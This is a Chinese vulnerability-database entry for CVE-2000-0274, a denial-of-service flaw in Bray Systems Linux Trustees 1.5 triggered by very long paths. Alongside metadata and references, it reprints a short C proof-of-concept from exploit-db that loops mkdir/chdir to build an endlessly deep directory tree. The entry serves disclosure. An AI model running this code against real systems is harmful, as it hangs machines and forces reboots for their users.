Bray Systems 1.5 Linux Trustee超长路径名漏洞

21次阅读
没有评论

Bray Systems 1.5 Linux Trustee超长路径名漏洞

漏洞ID 1105777 漏洞类型 边界条件错误
发布时间 2000-04-10 更新时间 2005-05-02
Bray Systems 1.5 Linux Trustee超长路径名漏洞CVE编号 CVE-2000-0274
Bray Systems 1.5 Linux Trustee超长路径名漏洞CNNVD-ID CNNVD-200004-015
漏洞平台 Linux CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/19837
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200004-015
|漏洞详情
TheLinuxtrusteeskernel路径存在漏洞,攻击者可以通过使用超长名访问文件或目录来触发拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/1096/info

Bray Systems Linux Trustees is an access control program which manages user permissions similar to implementations of Netware. Requesting an unusually long file or directory path will cause the application to hang. Other processes may also be affected. In order to regain normal functionality, the user must reboot the machine.

#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{

while(1) {
	if(mkdir("aaaa",0777)<0) {
		perror("mkdir");
		exit(1);
		}
	if(chdir("aaaa")<0) {
		perror("chdir");
		exit(1);
		}
	}

return(0);
}
|参考资料

来源:www.braysystems.com
链接:http://www.braysystems.com/linux/trustees.html
来源:BID
名称:1096
链接:http://www.securityfocus.com/bid/1096
来源:BUGTRAQ
名称:20000410linuxtrustees1.5longpathnamevulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2000-04/0035.html

相关推荐: Microsoft IIS缓冲区溢出漏洞

Microsoft IIS缓冲区溢出漏洞 漏洞ID 1207185 漏洞类型 缓冲区溢出 发布时间 1999-01-24 更新时间 1999-01-24 CVE编号 CVE-1999-1544 CNNVD-ID CNNVD-199901-045 漏洞平台 N/…

正文完
 0